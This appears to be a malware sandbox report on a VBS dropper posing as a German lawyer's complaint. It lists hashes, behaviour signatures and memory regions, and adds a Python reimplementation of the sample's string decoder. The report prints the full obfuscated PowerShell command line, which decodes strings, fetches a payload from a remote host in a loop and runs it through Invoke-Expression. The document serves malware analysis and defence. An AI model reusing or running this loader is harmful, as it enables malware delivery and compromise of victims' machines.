Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-10-2024 15:48

General

  • Target

    08102024_1541_Beschwerde-Rechtsanwalt.vbs

  • Size

    11KB

  • MD5

    a7f87588bc5a6ad03f79fa3085be9d28

  • SHA1

    c79dd84cd67b0846050b112ab4ce4b8c2f70794d

  • SHA256

    5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c

  • SHA512

    00dfd74685a88acb05970cfed07e5edbb605419f1ca4d8c0703ecb5dd436ef8b729c25bc5316e188d80c762a2f5b4a68a4b61b4dea8d7f1a50f477e76695bd21

  • SSDEEP

    192:RXVmQSH8ZNUYCxEXHnas8BK1gF8ylvACz74VT4DNIO+LtbA/ziLrRtEpDCBMjd/8:11SIxC+X91gZ/+pwz3wb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08102024_1541_Beschwerde-Rechtsanwalt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. 
Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. 
rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2484

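The powershell.exe command line above is built almost entirely from calls to one string decoder, forladelsens, whose output is handed to & ($Hedas) (...) for evaluation. Reading the function body: it walks the literal from offset 2 in steps of 3, so two filler characters precede every real character, and the upper bound Length - $cantino drops the trailing filler ($cantino is incremented once when $host.PrivateData is non-null, which it is in a normal console host). The two short literals decode directly from the page: ',pISeeBixF ' gives Iex and ' L>I ' gives >, so Tvangsapparat is Invoke-Expression and the URL list in $Cuticula is split on '>'. The Python below is an added example, not part of the report or of the sample, that reimplements the decoder and harvests the literals from a script body; the obfuscate helper, the LITERAL regex and SNIPPET are constructed for the example. The report's rendering collapses runs of spaces inside the longer literals (the filler positions no longer line up), so those must be taken from the raw command line or the .vbs rather than from this page before decoding.

```python
import re

# Mirror of the sample's forladelsens function (name kept from the sample):
#   for($i=2; $i -lt $s.Length - $cantino; $i+=3){ $out += $s[$i] }
# Every third character, starting at offset 2, is real; the two before it are
# filler. $cantino is 1 when $host.PrivateData is non-null (the normal case),
# which drops the trailing filler character.
def forladelsens(blob: str, cantino: int = 1) -> str:
    bound = len(blob) - cantino
    return "".join(blob[i] for i in range(2, bound, 3))


# Constructed inverse, used only to build input known to be well-formed:
# two filler characters before each real one, plus one trailing filler.
def obfuscate(plain: str, filler: str = "xy") -> str:
    if len(filler) != 2:
        raise ValueError("need exactly two filler characters")
    return "".join(filler + c for c in plain) + filler[0]


# Pull every  forladelsens '...'  literal out of a script body and decode it.
# Single-quoted PowerShell strings escape ' as ''; the sample does not use
# that, so the pattern simply stops at the first quote.
LITERAL = re.compile(r"forladelsens\s+'([^']*)'")


def decode_literals(script: str) -> list[str]:
    return [forladelsens(m) for m in LITERAL.findall(script)]


# Constructed snippet: the two literals are copied from the report's command
# line and the variable names are the sample's own.
SNIPPET = "$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';"

if __name__ == "__main__":
    for decoded in decode_literals(SNIPPET):
        print(repr(decoded))
    # 'Iex' is what  & ($Hedas) ($Varyler)  resolves to: Invoke-Expression,
    # so every Tvangsapparat(...) call evaluates one decoded string.
    print(forladelsens(obfuscate("Invoke-WebRequest")))
```

Run it against the full command line (extracted from the sandbox's raw process record, where the spacing is intact) to recover the rest of the literals; any literal whose length is not 1 mod 3 has lost characters in transit and should be treated as unreliable.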
Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabC093.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2484-20-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

    Filesize

    4KB

  • memory/2484-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2484-22-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/2484-23-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-24-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-26-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-25-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-27-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-28-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

    Filesize

    4KB

  • memory/2484-29-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-30-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB